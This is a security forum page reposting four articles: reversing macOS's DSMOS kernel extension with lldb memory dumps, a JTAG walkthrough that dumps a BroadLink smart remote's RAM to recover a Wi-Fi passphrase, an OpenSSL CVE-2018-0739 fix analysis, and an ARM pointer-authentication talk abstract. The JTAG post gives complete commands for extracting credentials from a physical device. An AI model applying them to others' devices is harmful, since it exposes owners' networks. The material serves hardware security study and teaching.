  22. Reversing a macOS Kernel Extension Oct 11, 2016 #kernel , #macOS , #lldb , #IDA In my last post I covered the basics of kernel debugging in macOS. In this post we will put some of that to use and work through the process of reversing a macOS kernel module. As I said in my last post, in macOS there is a kernel module named “Don’t Steal Mac OS X” (DSMOS) which registers a function with the Mach-O loader to unpack binaries that have the SG_PROTECTED_VERSION_1 flag set on their __TEXT segment. Finder, Dock, and loginwindow are a few examples of binaries that have this flag set. My goal for this post is to simply work through the kernel module with the intent of discovering its functionality and use it as an opportunity to learn a bit about kernel debugging. If you’d like to follow along I pulled the DSMOS module off of a laptop running macOS Sierra Beta (16A286a). Based on cursory looks at a couple copies from different versions of macOS it hasn’t changed much recently so you should be able to follow along with a copy from Mac OS X 10.11 or macOS Sierra. As you’ll see in the screenshots, I used IDA Pro for this reversing however using a program like Hopper would be fine as well. First Look At a glance, the DSMOS kernel module is fairly simple in terms of number of functions. It has 25 functions of which we only really care about 6. Most of the functions we don’t care about are constructors or destructors. Admittedly I haven’t taken the time to understand constructors and destructors used by a kernel module sp will be skipping them in this post. Typically when I first look at a binary I start by looking at the strings in the binary. Strings in DSMOS kernel module As seen in Figure 1, there really aren’t that many strings and they aren’t all that exciting. The most interesting is probably the string “AppleSMC” which is an indicator that this module interacts with the System Management Controller. Given that there are so few functions in this binary my approach was to simply go through each of them, have a quick look at the control flow graph (CFG) for a rough estimate of complexity, and put the function either on the “care” or “don’t care” list. Doing this I ended up with 9 functions of interest (see Table 1). Address Name 00000A9E sub_A9E 00000B2A sub_B2A 00000D30 sub_D30 00000E9E sub_E9E 0000125A sub_125A 00001616 sub_1616 00001734 sub_1734 00001C48 sub_1C48 00001C94 sub_1C94 Table 1: Potentially interesting function addresses and associated names. With these functions as starting points, the next step is to start working through them. At this point our goal is identify what each functionality each provides. Registering an IOService Notification Handler Main block of code in sub_A9E The relevant block of code from sub_A9E is shown in Figure 2. In words, this function first retrieves a matching dictionary for the AppleSMC service then installs a notification handler that is called when IOKit detects a service with the class name AppleSMC has been registered. In the call to IOService::addNotification() shown in Figure 2 the first argument is the address of the hanlder to be called. This handler is labelled as notificationHanlder in Figure 2 and not listed in Table 1 (it was a false negative); its located at address 00000B1A with a default name in IDA of sub_B1A. sub_B1A isn’t all that interesting, all it does is wrap sub_B2Adropping some arguments in the process. The Notification Handler When an IOService registers the AppleSMC class the code in sub_B2A will be notified. This function begins by calling OSMetaClassBase::safeMetaCast()to cast the incoming service into an AppleSMC service. Note that Apple’s documentation states that developers should not call OSMetaClassBase methods directly and should instead use provided macros. In this case, the call safeMetaCast() was likely generated by using the OSDynamicCastmacro which Apple lists as a valid macro to be used by developers. The next block in sub_B2A, shown in Figure 3, is where things actually start. Querying SMC for key Since C++ is horribly annoying to reverse due to all the indirect calls, rather than figuring out what method is represented by rax+850h I turned to Google. Searching for OSK0 and OSK1 turns up an article posted by Amit Singh. In it he talks briefly about an older version of the DSMOS kernel extenion and also provides code that uses the OSK0 and OSK1 strings to query the SMC for two keys. Once these keys have been acquired the kernel extension then computes a SHA-256 hash and compares to a value stored in memory. If this comparison fails, an error is printed (not shown). If the hashes match then we skip to the block shown in Figure 4. Installing DSMOS hook The first part of this basic block takes the address of byte_3AA4 and our keys returned from the SMC then calls sub_1616. If you look at sub_1616you’ll see it contains a couple loops and a bunch of byte manipulation I didn’t want to reverse. Looking at where byte_3AA4 is used you’ll see it is used in two places: here in sub_B2A and in sub_D30. Let’s wait a bit to see how it is used before figuring out how it is generated. After the call to sub_1616 we have two AES decryption keys set. The first key is the value returned from the SMC when queried with OSK0 and the second key is the value returned when OSK1 is used to query the SMC. Finally, we see a global variable named initialized set to 1 and a call to dsmos_page_transform_hook with the address of sub_D30 as a parameter. void dsmos_page_transform_hook(dsmos_page_transform_hook_t hook) { printf("DSMOS has arrived\n"); /* set the hook now - new callers will run with it */ dsmos_hook = hook; } Listing 1: Source code for dsmos_page_transform_hook from XNU source Searching for dsmos_page_transform_hook in the XNU source we find the code in Listing 1. This is a pretty simple funciton that simply sets the value of dsmos_hook to the provided function address. Usage of dsmos_hook in XNU At this point we will take step briefly away from IDA and kernel extension turning our attention to the XNU source. For this work I used the source of XNU 3248.60.10 which is the version used by Mac OS X 10.11.6. If you haven’t done so already, you can download the source from http://opensource.apple.com/release/os-x-10116/. As we saw, dsmos_page_transform_hook simply set the value of dsmos_hook. Continuing from here we find that dsmos_hook is only used in dsmos_page_transform_hook as we saw and in dsmos_page_transform(Listing 2). int dsmos_page_transform(const void* from, void *to, unsigned long long src_offset, void *ops) { static boolean_t first_wait = TRUE; if (dsmos_hook == NULL) { if (first_wait) { first_wait = FALSE; printf("Waiting for DSMOS...\n"); } return KERN_ABORTED; } return (*dsmos_hook) (from, to, src_offset, ops); } Listing 2: Usage of dsmos_hook by XNU After ensuring dsmos_hook the code in LIsting 2 just calls the hook with the parameters passed to dsmos_page_transform. This approach allows Apple some flexibility and opens up the opportunity to have multiple hooks in the future. Once again searching the XNU source, we see that the only use of dsmos_page_transform is in a function called unprotect_dsmos_segment. I have not included the source of unprotect_dsmos_segment since it is a bit longer and also not very exciting. The most interesting part about it is that it checks to see that the segment is long enough before attempting to call dsmos_page_transform on it. Continuing along, unprotect_dsmos_segment is only called by load_segment. load_segment is a much larger function and is not shown in its entirety but the relevant portion is shown in Listing 3. if (scp->flags & SG_PROTECTED_VERSION_1) { ret = unprotect_dsmos_segment(file_start, file_end - file_start, vp, pager_offset, map, vm_start, vm_end - vm_start); if (ret != LOAD_SUCCESS) { return ret; } } Listing 3: Call to unprotect_dsmos_segment from load_segment The interesting part of the code in Listing 3 is that unprotect_dsmos_segment is only called on segments with the SG_PROTECTED_VERSION_1 flag set. As mentioned earlier, macOS only includes a few binaries with this flag set such as Finder, Dock, and loginwindow. Main functionality of hook function The Hook Implementation At this point we know that the DSMOS kernel extension queries the SMC for a pair of keys, initializes some AES decryption contexts and global variables, then installs a hook by calling dsmos_page_transform_hook. We also know that the Mach-O loader in the kernel will call this hook when it finds a segment with the SG_PROTECTED_VERSION_1 flag set. The next question then is: what does the hook installed by the DSMOS kernel extension actually do? Main functionality of hook function Prior to the code shown in Figure 5 is the function prologue and setting of a stack cookie; after the code is the checking of the stack cookie and function epilogue. The code shown starts by checking to see if the initialization flag is set. This is the same initialization flag we saw being set in sub_B2A (see Figure 4). If this flag is not set the function exits, otherwise it enters a series of checks to identify which kernel is calling the hook. Searching the XNU source you can find the constant 0x2e69cf40 in the implementation of unprotect_dsmos_segment as shown in Listing 4. struct pager_crypt_info crypt_info; crypt_info.page_decrypt = dsmos_page_transform; crypt_info.crypt_ops = NULL; crypt_info.crypt_end = NULL; #pragma unused(vp, macho_offset) crypt_info.crypt_ops = (void *)0x2e69cf40; vm_map_offset_t crypto_backing_offset; crypto_backing_offset = -1; /* i.e. use map entry's offset */ Listing 4: XNU setting value of crypt_info.crypt_ops As Figure 5 shows, there are three basic cases implemented in the hook: no protection, an old kernel, and a new kernel. The basic block responsible for each case is labelled accordingly. I did not try to figure out which kernels mapped to which version however if you read the article by Amit Singhyou’ll notice that he talks about the method where each half of the page is encrypted with one of the SMC keys. In our kernel extension this corresponds to the old_kernel basic block. The method currently in use by Apple starts at the basic block labelled as new_kernel in Figure 5. In it we see an 8 byte buffer is zeroed then a call is made to a function I’ve called unprotect (named sub_1734 by IDA originally). Looking at the parameters to unprotect we see it takes the global buffer byte_3AA4 we saw earlier, the source buffer containing the page to be transformed, and the destination buffer to store the transformed page in among other parameters. This is the point in our reversing where things become very tedious since Apple has moved away from using AES to encrypt the pages to a custom method composed of many byte operations (e.g. shift left/right, logical/exclusive or). Unprotecting a Protected Page To properly set expectations, due to the tedious nature of this protection mechanism and me being somewhat satisfied with what I’ve learned so far I did not go through the full exercise of reversing Apple’s “unprotect” method. Originally I had intended to write a program that would be able to apply the transform to a given binary but that program is only partially completed and does not work. So, with expectations set sufficiently low lets get a feel for the implementation and a couple ways of approaching it. First lets step back briefly. Remember we saw the global variable byte_3AA4being initialized in sub_B2A and that I had said the code for that was also incredibly tediuous? Well, thanks to the ability to dump memory from the kernel through the debugger we don’t need to reverse it at all. We just need to connect to a running kernel and ask it politely. Dumping byte_3AA4 From a Running Kernel If you are unclear about how to use the kernel debugger then check out my previous post. To get started, on your remote machine start the debugger by hitting the NMI keys (left command, right command, and power together) then connect to the debugger from your local machine. The following lldb sessions shows the steps all put together. (lldb) kdp-remote 192.168.42.101 Version: Darwin Kernel Version 16.0.0: Fri Aug 5 19:25:15 PDT 2016; root:xnu-3789.1.24~6/DEVELOPMENT_X86_64; UUID=4F6F13D1-366B-3A79-AE9C-4 4484E7FAB18; stext=0xffffff802b000000 Kernel UUID: 4F6F13D1-366B-3A79-AE9C-44484E7FAB18 Load Address: 0xffffff802b000000 ... Process 1 stopped * thread #2: tid = 0x00b8, 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513, name = '0xffffff8 037046ee0', queue = '0x0', stop reason = signal SIGSTOP frame #0: 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513 [opt] (lldb) showallkexts OverflowError: long too big to convert UUID kmod_info address size id refs TEXT exec size version name ... B97F871A-44FD-3EA4-BC46-8FD682118C79 0xffffff7fadf449a0 0xffffff7fadf41000 0x5000 130 0 0xffffff7fadf41000 0x5000 7.0.0 com.apple.Dont_Steal_Mac_OS_X ... (lldb) memory read --force --binary --outfile byte_3AA4.bin 0xffffff7fadf44aa4 0xffffff7fadf44aa4+4172 4172 bytes written to '/Users/dean/Sites/lightbulbone.github.io/byte_3AA4.bin' We start out by connecting to the remote host using the kdp-remotecommand. Once everything has loaded we can get the address of the DSMOS kernel extension in memory using the showallkexts command. In my case the base address is 0xffffff7fadf41000. We then read the memory at address 0xffffff7fadf44aa4 which is the extension base address plus the offset of 0x3aa4; we read 4172 bytes since that is the size of the buffer. If you were writing a program to unprotect binaries you could use this extracted binary blob rather than trying to reverse the initialization algorithm. Emulating the Unprotect Algorithm Due to the tedious nature of the algorithm used to “unprotect” a page I decided to try using the Unicorn Engine to emulate it. This effort largely failed because it meant I would have to set up memory in Unicorn the same way as it is in the kernel extension and, as I said, the motivation wasn’t quite there. As far as I know this is possible however it to can be rather tedious; especially in cases where the algorithm isn’t as self-contained as in this case. Using an IDA plugin such as sk3wldbg may help however I was not aware of it at the time. Reversing the Unprotect Algorithm In the end I just sat down and started working through the algorithm in IDA. I did begin to write a program to unprotect before my motivation to work through the tedious code fell through the floor. For me, looking at DSMOS was an opportunity to learn what a kernel module I’ve known about for many years and become more familiar with the macOS kernel. That being said a few things a worth pointing out. Loop found in sub_1734 In Figure 6 a portion of sub_1734 is shown. In it we see the first eight bytes of the from pointer (stored in r14) being used to build a value to pass to sub_125A. Unrolled loop in sub_125A And, in Figure 7 we see part of sub_125A. In this part we see the first two iterations of an unrolled loop. The point of Figures 6 and 7 is to show some common constructs that come up when reversing code. If you’re not familiar with these constructs it may help to write some code yourself and then analyze the binary after compilation. Summary The intent of this post was to reverse engineer the DSMOS kernel extension in macOS. The goal was to understand what functionality the DSMOS extension provided to the kernel and to become more familiar with the XNU kernel. We also touched on IOKit briefly as well as a possible application of the Unicorn engine. If you have any questions or comments, please feel to reach out to me on Twitter @lightbulbone. Sursa: https://lightbulbone.com/posts/2016/10/dsmos-kext/
  23. JTAG on-chip debugging: Extracting passwords from memory Published 29/03/2018 | By ISA Following on from my colleague’s post on using UART to root a phone, I look at another of our challenges, whereby sensitive information such as passwords can be extracted from a device’s memory if physical access to the device is acquired. The goal and target BroadLink RM Pro Smart Remote Control The target device is the BroadLink RM Pro universal remote control designed for home convenience and automation. This smart remote control can be used to control multiple home appliances through its application. It also allows users to create scenarios whereby multiple actions can be programmed and activated simultaneously. Device setup and functionality is accessed through the BroadLink e-Control application. This application must be running on a device connected to the same Wi-Fi network as the smart remote and the appliance you want to control. BroadLink e-Control application For the purpose of this challenge, setting up the device is required. In a real scenario, the device would likely already be set up. Start by connecting the smart remote to a Wi-Fi network and entering the Wi-Fi SSID and Passphrase within the e-Controls application. The application then subsequently tries to locate the device within the network and once it is found, a connection is established. Now that the smart remote is functional, an attacker who has physical access to the device may attempt to extract configuration or sensitive information loaded in memory. Successfully replicating this attack scenario is the main goal of this challenge. Taking a look inside The first step is to investigate the internal components of the device, starting by carefully taking apart the unit. There are three easily removable housing screws situated on the underside of the device. Once opened, we can then identify different points of interest within the device. These can be internal or external ports, the board’s chips, components, model and serial numbers. Identifying the chip’s model and serial number is essential and will provide us with the information we need in latter stages. Inside BroadLink RM Pro Smart remote Looking for ways to communicate with the device is another key step. When working with embedded architectures, the presence of debug interfaces such as UART and JTAG is a common method used to establish serial connectivity to the device. JTAG Joint Test Action Group or more simply JTAG, is a standardised type of serial communication commonly used by engineers and developers to perform on-board testing or diagnostics of embedded devices, also known as boundary scanning. Another functionality of JTAG, which is seemingly more used today, is CPU level debugging allowing read-write access to registers and memory. The JTAG interface uses four connection points also known as Test Access Port or TAP. These connection points correspond to four signals: TDI – Test Data In; this signal represents input data sent to the device TDO – Test Data Out, which represents output data from the device TCK – Test Clock, used to synchronise data from the TMS and TDI (rising edge of Test Clock) and TDO (falling edge of Test Clock) TMS – Test Mode Select; this signal is used to control the state of the TAP controller TRST – Test Reset; this is an optional signal used for resetting the TAP controller Identifying JTAG pinouts The implementation of JTAG is non-standardised, which means that the signal pinouts you may encounter will vary between devices. Aside from the standalone JTAG connection points, commonly seen JTAG interfaces may be a part of a 10 pin, 14 pin, 16 or 20 pin header. JTAG pinouts Looking closely at the device, the five connection points on the corner of the board is the JTAG interface. Using the JTAG’s debugging functionality should enable us to read and write data stored in memory. Note: Some devices will have JTAG present but their connections will have been disabled before being released into production. There are various tools available which can be used to identify JTAG signal pinouts, all of which vary in available features and pricing. Common examples are JTAGenum (for Arduino), JTAGulator and Hydrabus to name a few. For the purpose of this challenge, a JTAGulator is used. The JTAGulator supports a number of functionalities, including both the identification of UART and JTAG pinouts. The JTAGulator Connecting the JTAGulator The JTAGulator is connected to the smart remote starting from the lowest number of channels/pins on the board (CH0-CH4). The lowest numbered pinouts are used due to the brute-force method used by the JTAGulator to identify the signal value for each pinout. Using the lowest pin number decreases the number of permutation to iterate through and ultimately speeds up the identification process. JTAGulator connected to the device’s JTAG pins Once connected, you can control using the JTAGulator via USB connection, which will appear as a serial interface. A number of terminal emulators such as PuTTY, Hyperterminal or Minicom can be used to interface with the JTAGulator. In this instance, we will use ‘screen’ utility, which is installed by default on many Linux distributions. It can be used to establish a serial connection to the JTAGulator via the default ttyUSB0 device in Linux machines. The JTAGulator’s baudrate of 115200 should also be provided like so: ? $ sudo screen /dev/ttyUSB0 115200 Once a serial connection to the JTAGulator is established, pressing the ‘h’ key shows a list of JTAG commands available. The first step is to set the target voltage to 3.3V, which pertains to the voltage required by the microprocessor. 3.3V is commonly used by most chips; however, accurate information regarding the operational voltage can be found by looking through the chip’s specification sheet. Setting the correct voltage is important as an incorrect voltage could damage or destroy the device. After setting the voltage, the “Identify JTAG pinout (IDCODE Scan) can be used to identify JTAG pins, which works by reading the device IDs – specifically, TDO, TMS and TCK signals. To identify the TDI pin, the BYPASS scan is used. When running the scans, enter the number of channels to use as five; this will allow the JTAGulator to use the connections made channels CH0 to CH4. The scans should complete fairly quickly as there are only five pins exposed in the board, resulting in a lower number of permutations to be made. If the JTAG implementation appears alongside multiple pinouts, this can increase the number of permutations, thus increasing the duration of the scan. Identifying JTAG pinouts (BYPASS scan) The result of the BYPASS scan show us the location of the signal pinouts on the JTAGulator, which corresponds to the signal pinouts on the smart remote. You can skip this step entirely if the JTAG pinouts are labelled on the silkscreen print on the board, so do not forget to check both sides of the PCB, as it may save valuable time. JTAG signal pinouts printed underneath the board The Shikra In order for us to get debug access on the smart remote, a JTAG adapter and an OCD system is required. Many devices on the market allow interfacing with JTAG, such as Bus Pirate, Shikra and HydraBus. For this scenario, the Shikra and OpenOCD is used. The Shikra is an FT232H USB device often referred to as the “Swiss army knife of hardware hacking”; this device allows us to connect to a number of data interfaces, including UART, JTAG and SPI. A Shikra can be purchased from Xipiter: https://int3.cc/products/the-shikra. The Shikra The following diagram shows the Shikra pinouts for JTAG, which will be used to connect to the board’s corresponding JTAG pinouts. Ensure that the ground (GND) pin is also connected to a ground point on the board. Shikra JTAG connections http://www.xipiter.com/uploads/2/4/4/8/24485815/shikra_documentation.pdf The Shikra giving serial to USB connectivity OpenOCD OpenOCD allows us to perform on-chip debugging of the smart remote via JTAG. In Linux-based systems, you can install the OpenOCD package by running the following command: ? $ sudo apt-get install openocd In order for us to use OpenOCD, a configuration file for the adapter (Shikra) and the target (Smart remote) are required. OpenOCD comes with a number of pre-installed interface and target configuration files; however, the one required does not come in the pre-installed list. The configuration file for the adapter can be found in Xipiter’s getting started guide for the Shikra. Shikra OpenOCD configuration file: ? #shikra.cfg interface ftdi ftdi_vid_pid 0x0403 0x6014 ftdi_layout_init 0x0c08 0x0f1b adapter_khz 2000 #end shikra.cfg Obtaining the configuration file for the target was not as straight forward. The configuration file required was not available within the pre-installed configuration files and attempting to use any of them results in compatibility errors with the device. The approach taken in identifying the appropriate target configuration file involved looking up the microprocessor’s make and model. Using a magnifying glass or a good enough camera, the specific chip printings can be determined. The chip in question is a Marvell 88MC200 and a simple Google search of this chip and the keyword OpenOCD returns the target configuration needed. ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 # # Marvell's Wireless Microcontroller Platform (88MC200) # # https://origin-www.marvell.com/microcontrollers/wi-fi-microcontroller-platform/ # #source [find interface/ftdi/mc200.cfg] if " [info exists CHIPNAME] " " set _CHIPNAME $CHIPNAME " else " set _CHIPNAME mc200 " set _ENDIAN little # Work-area is a space in RAM used for flash programming # By default use 16kB if " [info exists WORKAREASIZE] " " set _WORKAREASIZE $WORKAREASIZE " else " set _WORKAREASIZE 0x4000 " # JTAG scan chain if " [info exists CPUTAPID ] " " set _CPUTAPID $CPUTAPID " else " set _CPUTAPID 0x4ba00477 " jtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID set _TARGETNAME $_CHIPNAME.cpu target create $_TARGETNAME cortex_m -endian $_ENDIAN -chain-position $_TARGETNAME $_TARGETNAME configure -work-area-phys 0x2001C000 -work-area-size $_WORKAREASIZE -work-area-backup 0 # Flash bank set _FLASHNAME $_CHIPNAME.flash flash bank $_FLASHNAME mrvlqspi 0x0 0 0 0 $_TARGETNAME 0x46010000 # JTAG speed should be <= F_CPU/6. F_CPU after reset is 32MHz # so use F_JTAG = 3MHz adapter_khz 3000 adapter_nsrst_delay 100 if "[using_jtag]" " jtag_ntrst_delay 100 " if "![using_hla]" " # if srst is not fitted use SYSRESETREQ to # perform a soft reset cortex_m reset_config sysresetreq " The above configuration file was pointing to an interface path (line 7) which was not required and therefore has been commented out. The configuration file previously downloaded will be used instead and the file location specified as a command line argument in OpenOCD. Once both target and interface configuration files are saved locally, run the following OpenOCD command: ? $ openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/mc200.cfg The file path points to shikra.cfg file, which contains the interface configuration and mc200.cfg contains the target board configuration. The on-chip debugger should now be running and will open local port 4444 on your system. You can then simply connect to this port with Telnet: ? $ telnet localhost 4444 Dumping the device memory Once connected, debug access to the board is now possible and allows control of registers and memory address. Before the registers can be accessed, sending a halt request is required to send the target into a debugging state. After sending the halt request, the reg command is used to view all of the available registers and its values on the device’s CPU. The full list of useful commands is available in the OpenOCD documentation. Registers values shown in OpenOCD Highlighted in the above image is the Stack Pointer (SP) register. Discussing how computer addressing works is beyond the scope of this blog (it is not a simple subject!). For now, it is enough to understand that the location of the Stack Pointer contains the last value pushed onto the stack of things in memory (RAM), serving as the starting address from where user space memory can be accessed. Going back to the original goal of extracting sensitive information from the device, the “dump_image” command can be used to dump memory content (in hex). To successfully dump as much information as possible, a trial and error approach to identify the boundaries of user space memory can be taken. The dump_image command can be used as follows: ? $ dump_image img_out2 0x20002898 120000 The img_out2 argument is the output filename; the next argument is the Stack Pointer address and finally the amount of memory to dump in bytes. Dumping memory to a file The image above shows that initial attempts at dumping memory may fail if a larger amount of bytes than what is available is specified. After successfully dumping the contents of memory in hex, an analysis of the file can be performed to identify any information that might be of interest. Wi-Fi passphrase next to the SSID A hex editor of your choice can be used to navigate around the contents of the file and in the example above, we have used Ghex. Looking around the file and by performing a quick search, we can see the SSID name the device is connected to. 18 bytes after it, the passphrase was also shown. If we had purchased this device second-hand, then we could potentially use it to access someone’s home network and launch further attacks. Conclusion Cyber attacks on smart home devices should now be recognised by home consumers. On the other hand, manufacturers should consider methods for securing the hardware aspect – the very foundation of these devices – to ensure the security and privacy of its users. Cisco’s hardware hacking challenges gives us the opportunity to learn different methods to tamper or attack a device, therefore promoting a greater understanding of the security risks and controls they present. This post has presented a simple proof-of-concept attack on a consumer smart device, whereby a user’s Wi-Fi passphrase can be extracted and therefore allow an attacker to achieve persistent access to a victim’s network. This type of attack can be prevented by disabling – or more effectively – removing the JTAG ports completely from production devices, thereby minimising its attack surface. Sursa: https://labs.portcullis.co.uk/blog/jtag-on-chip-debugging-extracting-passwords-from-memory/
  24. CVE-2018-0739: OpenSSL ASN.1 stack overflow This was a vulnerability discovered by Google’s OSS-Fuzz project and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h and based on OpenSSL team’s assessment, this cannot be triggered via SSL/TLS but constructed ASN.1 types with support for recursive definitions, such as PKCS7 can be used to trigger it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 /* * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and * tag mismatch return -1 to handle OPTIONAL */ static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in, long len, const ASN1_ITEM *it, int tag, int aclass, char opt, ASN1_TLC *ctx) { const ASN1_TEMPLATE *tt, *errtt = NULL; const ASN1_EXTERN_FUNCS *ef; const ASN1_AUX *aux = it->funcs; ASN1_aux_cb *asn1_cb; const unsigned char *p = NULL, *q; unsigned char oclass; char seq_eoc, seq_nolen, cst, isopt; long tmplen; int i; int otag; int ret = 0; ASN1_VALUE **pchptr; if (!pval) return 0; if (aux &amp;&amp; aux->asn1_cb) asn1_cb = aux->asn1_cb; else asn1_cb = 0; switch (it->itype) { ... return 0; } What you see above is a snippet of crypto/asn1/tasn_dec.c where the decoding ASN.1 function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that given a malicious PKCS7 file this decoding routine will keep on trying to decode them until the process will run out of stack space. To fix this, a new error case was added in crypto/asn1/asn1.h header file named ASN1_R_NESTED_TOO_DEEP. If we have a look at crypto/asn1/asn1_err.c we can see that the new error code is equivalent to the “nested too deep” error message. 1 2 3 {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"}, + {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"}, {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"}, Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) definition was added which is used to define the maximum amount of recursive invocations of asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c. 1 2 3 4 5 6 7 8 9 10 11 #include <openssl/err.h> /* * Constructed types with a recursive definition (such as can be found in PKCS7) * could eventually exceed the stack given malicious input with excessive * recursion. Therefore we limit the stack depth. This is the maximum number of * recursive invocations of asn1_item_embed_d2i(). */ #define ASN1_MAX_CONSTRUCTED_NEST 30 static int asn1_check_eoc(const unsigned char **in, long len); Lastly, the asn1_item_embed_d2i() function itself was modified to have a new integer argument “depth” which is used as a counter for each iteration. You can see how check is performed before entering the switch clause here. 1 2 3 4 5 6 7 8 9 asn1_cb = 0; if (++depth > ASN1_MAX_CONSTRUCTED_NEST) { ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP); goto err; } switch (it->itype) { case ASN1_ITYPE_PRIMITIVE: Similarly, all calling functions on OpenSSL have been updated to ensure that the new argument is used as intended. The official security advisory describes the above vulnerability like this. Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739) ========================================================================================== Severity: Moderate Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. OpenSSL 1.1.0 users should upgrade to 1.1.0h OpenSSL 1.0.2 users should upgrade to 1.0.2o This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project. The fix was developed by Matt Caswell of the OpenSSL development team. Sursa: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
      • 1
      • Upvote
  25. Microsoft Security Response Center (MSRC) Publicat pe 14 feb. 2018 ABONEAZĂ-TE 287 Rob Turner, Qualcomm Technologies Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures. Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...
      • 1
      • Upvote
×
×
  • Create New...